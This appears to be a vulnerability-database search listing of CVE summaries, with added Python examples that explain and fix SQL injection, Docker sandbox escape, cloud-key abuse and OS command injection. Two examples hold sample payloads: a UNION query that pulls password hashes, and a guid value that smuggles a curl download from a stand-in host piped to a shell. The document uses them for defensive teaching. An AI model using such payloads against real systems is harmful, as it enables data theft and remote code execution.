Lucene search

17262 matches found

Redos
added 2026/02/24 12:00 a.m., 6 views

ROS-20260224-73-0003

A vulnerability in the ngx_mail_smtp response header handler of NGINX Plus and NGINX Open Source web servers is related to a violation of the initial buffer boundary. Exploitation of the vulnerability could allow an attacker acting remotely to gain read access to the data...

CVSS 6.3, AI score 5.7, EPSS 0.00371
Exploits: 0
CVE
added 2026/02/23 4:12 p.m., 10 views

CVE-2026-22568

CVE-2026-22568 affects the ZIA Admin UI. An authenticated administrator could potentially retrieve unauthorized internal information due to improper neutralization of certain input in rare conditions. The CVSS 3.1 base score is 5.5 (Medium) with Privileges Required: High, User Interaction: None, ...

CVSS 5.5, AI score 5.3, EPSS 0.00161
Exploits: 0, References: 1, Affected Software: 1
IBM Security Bulletins
added 2026/02/23 9:28 a.m., 18 views

Security Bulletin: IBM App Connect Enterprise is vulnerable to multiple vulnerabilities due to IBM Semeru Runtime (CVE-2026-21945, CVE-2026-21932, CVE-2026-21933, CVE-2026-21925 & CVE-2026-1188)

Summary: IBM App Connect Enterprise is vulnerable to multiple vulnerabilities due to IBM Semeru Runtime. Vulnerability Details: CVEID: CVE-2026-21945. DESCRIPTION: Java SE is vulnerable to a denial of service, caused by an easily exploitable vulnerability that allows a remote attacker to cause...

CVSS 9.8, AI score 6.2, EPSS 0.00572
Exploits: 0, Affected Software: 1
Vulnrichment
added 2026/02/22 2:12 p.m., 4 views

CVE-2019-25462 Web Ofisi Rent a Car v3 SQL Injection via klima Parameter

Web Ofisi Rent a Car v3 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'klima' parameter. Attackers can send GET requests with malicious 'klima' values to extract sensitive database information or...

CVSS 8.8, AI score 5.8, EPSS 0.00262
Exploits: 0, References: 3
Cvelist
added 2026/02/22 1:18 p.m., 24 views

CVE-2019-25442 Web Wiz Forums 12.01 SQL Injection via PF Parameter

Web Wiz Forums 12.01 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the PF parameter. Attackers can send GET requests to memberprofile.asp with malicious PF values to extract sensitive database information...

CVSS 8.8, EPSS 0.0038
Exploits: 1, References: 2
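The two entries above (CVE-2019-25462 via 'klima' and CVE-2019-25442 via PF) and the WorkTime "widget" API entry further down all describe the same bug class: a request parameter spliced into SQL text. The following is an added example, not code from any of those products (which are PHP/ASP applications; Python and SQLite are used here only to make the pattern runnable). The tables, rows and the admin hash are constructed, and the column name `klima` is taken from the first entry; everything else is an assumption.

```python
"""SQL injection through a GET parameter: the vulnerable query beside the fix.

Added example; not code from Web Ofisi, Web Wiz Forums or WorkTime.
The schema and the rows are constructed for the demonstration.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for a rent-a-car site's database."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE cars (name TEXT, klima TEXT);
        INSERT INTO cars VALUES ('Fiat Egea', '1'), ('Renault Clio', '0');
        CREATE TABLE admins (username TEXT, password_hash TEXT);
        INSERT INTO admins VALUES ('admin', 'constructed-hash-value');
    """)
    return con


# A 'klima' value an unauthenticated client could put in the query string.
# The UNION pulls a row from an unrelated table; '--' comments out the
# closing quote that the vulnerable code appends.
PAYLOAD = "x' UNION SELECT password_hash FROM admins--"


def cars_with_klima_vulnerable(con: sqlite3.Connection, klima: str) -> list[str]:
    """The bug class: the request value becomes part of the SQL text."""
    sql = f"SELECT name FROM cars WHERE klima = '{klima}'"
    return [row[0] for row in con.execute(sql)]


def cars_with_klima_safe(con: sqlite3.Connection, klima: str) -> list[str]:
    """Fix: the value travels as a bound parameter, never as SQL text.

    The allowlist check is defence in depth for a field that can only be
    '0' or '1'; the parameter binding is what removes the injection.
    """
    if klima not in ("0", "1"):
        return []
    rows = con.execute("SELECT name FROM cars WHERE klima = ?", (klima,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", cars_with_klima_vulnerable(db, PAYLOAD))  # leaks the hash
    print("safe:      ", cars_with_klima_safe(db, PAYLOAD))        # []
```

Run it and the vulnerable handler returns the admin hash for the payload while the parameterised handler returns nothing; a normal value ('1') behaves the same in both.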
CNNVD
added 2026/02/20 12:00 a.m., 6 views

OpenClaw security vulnerability

OpenClaw is an open source intelligent AI assistant. OpenClaw suffers from a security vulnerability that stems from a configuration injection issue in the Docker tool sandbox, which an attacker can exploit to cause container escape or host data access...

CVSS 9.8, AI score 5.8, EPSS 0.00479
Exploits: 0, References: 3
Redos
added 2026/02/20 12:00 a.m., 3 views

ROS-20260220-73-0015

A vulnerability in the net/sched/sch_hfsc.c component of the Linux operating system kernel is related to incomplete clearing of temporary or auxiliary resources. Exploitation of the vulnerability could allow an attacker to gain access to sensitive data, compromise its integrity, and cause denial o...

CVSS 5.5, AI score 7.2, EPSS 0.00151
Exploits: 0
ATTACKERKB
added 2026/02/19 11:12 p.m., 6 views

CVE-2026-27002

OpenClaw is a personal AI assistant. Prior to version 2026.2.15, a configuration injection issue in the Docker tool sandbox could allow dangerous Docker options (bind mounts, host networking, unconfined profiles) to be applied, enabling container escape or host data access. OpenClaw 2026.2.15 block...

CVSS 7.7, AI score 5.5, EPSS 0.00479
Exploits: 0, References: 4, Affected Software: 1
OSV
added 2026/02/19 11:12 p.m., 5 views

CVE-2026-27002 OpenClaw: Docker container escape via unvalidated bind mount config injection

OpenClaw is a personal AI assistant. Prior to version 2026.2.15, a configuration injection issue in the Docker tool sandbox could allow dangerous Docker options (bind mounts, host networking, unconfined profiles) to be applied, enabling container escape or host data access. OpenClaw 2026.2.15 block...

CVSS 7.7, AI score 5.5, EPSS 0.00479
Exploits: 0, References: 5
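The CVE-2026-27002 entries above describe a tool sandbox that let caller-influenced Docker options (bind mounts, host networking, unconfined profiles) reach `docker run`. The following is an added example, not OpenClaw's code, of the validation step such a sandbox needs before it builds the command line: it refuses bind mounts outside an allowed root or mounted read-write, any network mode other than none/bridge, unconfined seccomp/AppArmor settings, and privileged mode. The config keys (`binds`, `network`, `security_opt`, `privileged`, `image`), the allowed mount root and the image name are assumptions made for the example.

```python
"""Reject dangerous Docker sandbox options before they reach `docker run`.

Added example, not OpenClaw's code. The config shape and the allowlists
are assumptions chosen to show the class of bug CVE-2026-27002 describes.
"""
import os
import re

# Host directories a sandbox may expose (read-only). Assumed for the example.
ALLOWED_MOUNT_ROOTS = ("/srv/sandbox/",)
# Isolated networking only; "host" would hand the container the host's stack.
ALLOWED_NETWORKS = {"none", "bridge"}


class UnsafeDockerConfig(ValueError):
    """Raised for any option that would weaken the sandbox boundary."""


def validate_sandbox_config(cfg: dict) -> list[str]:
    """Return the argv for `docker run` built from cfg, or raise.

    cfg may carry (all optional, all potentially attacker-influenced):
      binds:        ["host_path:container_path[:mode]", ...]
      network:      docker network mode (default "none")
      security_opt: ["seccomp=...", "apparmor=...", ...]
      privileged:   bool
      image:        image reference
    """
    args = ["docker", "run", "--rm"]

    if cfg.get("privileged"):
        raise UnsafeDockerConfig("privileged containers are not allowed")

    network = cfg.get("network", "none")
    if network not in ALLOWED_NETWORKS:
        raise UnsafeDockerConfig(f"network mode {network!r} not allowed")
    args += ["--network", network]

    for opt in cfg.get("security_opt", []):
        # seccomp=unconfined / apparmor=unconfined switch off the syscall
        # filter and the MAC profile the sandbox relies on.
        if re.search(r"unconfined", opt, re.IGNORECASE):
            raise UnsafeDockerConfig(f"security_opt {opt!r} disables confinement")
        args += ["--security-opt", opt]

    for bind in cfg.get("binds", []):
        parts = bind.split(":")
        if len(parts) < 2:
            raise UnsafeDockerConfig(f"malformed bind {bind!r}")
        host, container = parts[0], parts[1]
        mode = parts[2] if len(parts) > 2 else "rw"
        # Collapse ".." so "/srv/sandbox/../etc" cannot pass the prefix check.
        # A real deployment should also realpath() on the host to defeat symlinks.
        host = os.path.normpath(host)
        if not host.startswith(ALLOWED_MOUNT_ROOTS):
            raise UnsafeDockerConfig(f"host path {host!r} is outside the sandbox root")
        if mode != "ro":
            raise UnsafeDockerConfig(f"bind {bind!r} must be read-only")
        args += ["-v", f"{host}:{container}:ro"]

    args.append(cfg.get("image", "sandbox:latest"))
    return args


def is_safe_config(cfg: dict) -> bool:
    """Convenience predicate: True if validate_sandbox_config accepts cfg."""
    try:
        validate_sandbox_config(cfg)
        return True
    except UnsafeDockerConfig:
        return False


if __name__ == "__main__":
    print(validate_sandbox_config({"binds": ["/srv/sandbox/job1:/work:ro"]}))
    for bad in ({"binds": ["/:/host:ro"]}, {"network": "host"},
                {"security_opt": ["seccomp=unconfined"]}, {"privileged": True}):
        print(bad, "->", "rejected" if not is_safe_config(bad) else "ACCEPTED?!")
```

The important design choice is that the validator builds the argv itself from a small allowlist rather than filtering a free-form option string: anything the schema does not name never reaches Docker.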
Qualys Blog
added 2026/02/19 5:00 p.m., 9 views

How Security Tool Misuse Is Reshaping Cloud Compromise

Key Takeaways: Legitimate secret-scanning tools such as TruffleHog have been operationalized in real-world cloud attack campaigns. Attack progression commonly follows a repeatable sequence: credential discovery, live validation, permission enumeration, and data access. Exposed long-lived access ke...

AI score 5.8
Exploits: 0
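The Qualys entry above gives the attack progression as a repeatable sequence (credential discovery, live validation, permission enumeration, data access). Once a key has been discovered, the last three steps all show up in the cloud audit trail for the same access key, which is what a detection can key on. The following is an added example, not Qualys' code: it walks CloudTrail-like events grouped by access key and reports a key that runs validation, then IAM/storage enumeration, then data access inside a short window, together with any source IP not previously seen for that key. The sample events and the baseline of known IPs are constructed; the event names follow CloudTrail, while the window length and the stage-to-API mapping are assumptions.

```python
"""Detect the validate -> enumerate -> access chain on one cloud access key.

Added example, not Qualys' code. SAMPLE_EVENTS and KNOWN_IPS are constructed
CloudTrail-like records; the API-to-stage mapping and WINDOW are assumptions.
"""
from datetime import datetime, timedelta

# Stage mapping (assumed): what each step of the chain looks like in CloudTrail.
VALIDATION = {"GetCallerIdentity"}
ENUMERATION = {"ListAttachedUserPolicies", "ListUserPolicies", "GetUser",
               "GetAccountAuthorizationDetails", "ListRoles", "ListBuckets"}
DATA_ACCESS = {"GetObject", "ListObjects", "GetSecretValue", "GetParameter"}
WINDOW = timedelta(minutes=30)  # assumed: whole chain inside half an hour


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def detect_key_abuse(events, known_ips):
    """Return one finding per access key that completes the chain in order.

    events:    iterable of CloudTrail-like dicts (eventTime, eventName,
               sourceIPAddress, userIdentity.accessKeyId)
    known_ips: {accessKeyId: set(ip)} baseline of addresses seen before
    """
    by_key = {}
    for ev in sorted(events, key=lambda e: e["eventTime"]):
        key = ev.get("userIdentity", {}).get("accessKeyId")
        if key:
            by_key.setdefault(key, []).append(ev)

    findings = []
    for key, evs in by_key.items():
        validated = enumerated = accessed = None
        for ev in evs:  # chronological, so stage order is enforced
            name, when = ev["eventName"], _ts(ev["eventTime"])
            if validated is None and name in VALIDATION:
                validated = when
            elif validated is not None and enumerated is None and name in ENUMERATION:
                enumerated = when
            elif enumerated is not None and accessed is None and name in DATA_ACCESS:
                accessed = when
        if accessed is not None and accessed - validated <= WINDOW:
            seen = {e["sourceIPAddress"] for e in evs}
            findings.append({
                "accessKeyId": key,
                "chain": (validated, enumerated, accessed),
                "new_source_ips": sorted(seen - known_ips.get(key, set())),
            })
    return findings


def _ev(t, name, ip, key):
    return {"eventTime": t, "eventName": name, "sourceIPAddress": ip,
            "userIdentity": {"accessKeyId": key}}


# Constructed sample: a leaked key worked from a TEST-NET address, next to a
# CI key doing its usual GetObject. Key IDs are the AWS documentation examples.
LEAKED, CI = "AKIAIOSFODNN7EXAMPLE", "AKIAI44QH8DHBEXAMPLE"
SAMPLE_EVENTS = [
    _ev("2026-02-19T10:00:05Z", "GetCallerIdentity", "203.0.113.7", LEAKED),
    _ev("2026-02-19T10:00:09Z", "ListAttachedUserPolicies", "203.0.113.7", LEAKED),
    _ev("2026-02-19T10:01:30Z", "ListBuckets", "203.0.113.7", LEAKED),
    _ev("2026-02-19T10:02:00Z", "GetObject", "198.51.100.4", CI),
    _ev("2026-02-19T10:04:12Z", "GetObject", "203.0.113.7", LEAKED),
]
KNOWN_IPS = {LEAKED: {"198.51.100.4"}, CI: {"198.51.100.4"}}

if __name__ == "__main__":
    for f in detect_key_abuse(SAMPLE_EVENTS, KNOWN_IPS):
        print(f["accessKeyId"], "chain", f["chain"], "new IPs", f["new_source_ips"])
```

A key that only ever reads objects (the CI key) produces no finding, because the chain requires the validation call first; that ordering, plus the new-IP check, is what separates a stolen long-lived key from a noisy but legitimate one.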
ATTACKERKB
added 2026/02/19 10:48 a.m., 6 views

CVE-2025-15560

An authenticated attacker with minimal permissions can exploit a SQL injection in the WorkTime server "widget" API endpoint to inject SQL queries. If the Firebird backend is used, attackers are able to retrieve all data from the database backend. If the MSSQL backend is used the attacker can...

AI score 6.2, EPSS 0.00251
Exploits: 0, References: 2, Affected Software: 1
OSV
added 2026/02/19 10:16 a.m., 2 views

CVE-2025-12107

Due to the use of a vulnerable third-party Velocity template engine, a malicious actor with admin privilege may inject and execute arbitrary template syntax within server-side templates. Successful exploitation of this vulnerability could allow a malicious actor with admin privilege to inject and...

CVSS 7.2, AI score 6.3, EPSS 0.00618
Exploits: 0, References: 1
RedhatCVE
added 2026/02/19 1:27 a.m., 5 views

CVE-2026-23595

An authentication bypass in the application API allows an unauthorized administrative account to be created. A remote attacker could exploit this vulnerability to create privileged user accounts. Successful exploitation could allow an attacker to gain administrative access, modify system...

CVSS 8.8, AI score 5.7, EPSS 0.00299
Exploits: 0, References: 1
GithubExploit
added 2026/02/19 12:01 a.m., 126 views

SQL-injection-explained

SQL-injection-explained. Today's topic: SQL Injections. Here is y...

AI score 6.1
Exploits: 0
CNNVD
added 2026/02/19 12:00 a.m., 5 views

WordPress plugin Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent security vulnerability

WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blog platform developed using the PHP language. This platform allows for the creation of personal blog websites on servers based on PHP and MySQL. A WordPress plugin is an application that can be install...

CVSS 8.8, AI score 5.8, EPSS 0.00356
Exploits: 0, References: 2
VulnCheck KEV
added 2026/02/19 12:00 a.m., 1 view

VulnCheck KEV: CVE-2025-12845

The Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent plugin for WordPress is vulnerable to unauthorized access of data that leads to privilege escalation due to a missing capability check on the gettabledata function in versions 0.5.4 to 1.2.1. This makes it possible...

CVSS 8.8, AI score 5.8, EPSS 0.00356
Exploited in the wild; Exploits: 0, References: 2
Positive Technologies
added 2026/02/19 12:00 a.m., 6 views

PT-2026-20799

An authenticated attacker with minimal permissions can exploit a SQL injection in the WorkTime server "widget" API endpoint to inject SQL queries. If the Firebird backend is used, attackers are able to retrieve all data from the database backend. If the MSSQL backend is used the attacker can...

AI score 6.2, EPSS 0.00251
Exploits: 0, References: 1
Positive Technologies
added 2026/02/19 12:00 a.m., 4 views

PT-2026-20798

An unauthenticated attacker can inject OS commands when calling a server API endpoint in NesterSoft WorkTime. The server API call to generate and download the WorkTime client from the WorkTime server is vulnerable in the "guid" parameter. This allows an attacker to execute arbitrary commands on t...

AI score 6.1, EPSS 0.00441
Exploits: 0, References: 1
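The PT-2026-20798 entry above is an OS command injection through a "guid" parameter of a generate-and-download endpoint. A GUID has a fixed syntax, which makes this one of the easier injection classes to close completely. The following is an added example, not WorkTime's code: it shows the vulnerable shell-string construction beside a version that parses the value as a UUID, re-serialises the canonical form, and returns an argv list for `subprocess.run(..., shell=False)`. The generator program name `generate_client`, its flags and the output directory are hypothetical; the payload is constructed and uses a TEST-NET address.

```python
"""Handle a client-download "guid" parameter without letting it reach a shell.

Added example for PT-2026-20798; not NesterSoft WorkTime code. The program
name `generate_client`, its flags and the output path are hypothetical.
"""
import uuid


def build_command_vulnerable(guid: str) -> str:
    """The bug class: the request value is spliced into a shell command line.

    Anything a shell treats specially (';', '|', '$(...)') is executed.
    """
    return f"generate_client --guid {guid} --out /var/worktime/clients/{guid}.exe"


def parse_guid(guid: str) -> uuid.UUID:
    """Accept only a syntactically valid UUID; reject everything else."""
    try:
        return uuid.UUID(guid)
    except (ValueError, TypeError, AttributeError) as exc:
        raise ValueError(f"invalid guid: {guid!r}") from exc


def build_command_safe(guid: str) -> list[str]:
    """Return argv for subprocess.run(argv, shell=False).

    Two things make this safe: no shell is involved, and the value used is
    the canonical str() of the parsed UUID, so even the extra characters
    uuid.UUID tolerates on input (braces, urn:uuid:, upper case) never
    appear in the command or the output path.
    """
    canonical = str(parse_guid(guid))
    return ["generate_client", "--guid", canonical,
            "--out", f"/var/worktime/clients/{canonical}.exe"]


def is_accepted(guid: str) -> bool:
    """True if build_command_safe would run with this guid."""
    try:
        build_command_safe(guid)
        return True
    except ValueError:
        return False


# Constructed payload: a UUID-looking prefix followed by a shell pipeline.
PAYLOAD = "8f3c2a1e-5b6d-4c7a-9e0f-123456789abc; curl http://203.0.113.9/x | sh"

if __name__ == "__main__":
    print(build_command_vulnerable(PAYLOAD))   # pipeline survives intact
    print(build_command_safe("{8F3C2A1E-5B6D-4C7A-9E0F-123456789ABC}"))
    print(is_accepted(PAYLOAD))                # False
```

The same shape (parse into a typed value, emit its canonical form, pass argv without a shell) applies to any identifier-like parameter; a deny-list of shell metacharacters is the approach that keeps getting bypassed.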
Positive Technologies
added 2026/02/19 12:00 a.m., 4 views

PT-2026-20796

Name of the Vulnerable Software and Affected Versions: versions prior to Feb. 19, 2026. Description: The software uses a vulnerable third-party Velocity template engine, allowing a malicious actor with admin privilege to inject and execute arbitrary template syntax within server-side templates...

CVSS 10.0, AI score 6.0, EPSS 0.00618
Exploits: 0, References: 8
OSV
added 2026/02/18 12:00 p.m., 4 views

RUSTSEC-2026-0013 Type confusion when accessing data from subclasses of subclasses of native types with `abi3` feature targeting Python 3.12 and up

PyO3 0.28.1 added support for `#[pyclass(extends=PyList)] struct NativeSub` and other native types when targeting Python 3.12 and up with the `abi3` feature. It was discovered that subclasses of such classes would use the type of the subclass when attempting to access data of NativeSub contained within...

AI score 5.5
Exploits: 0, References: 3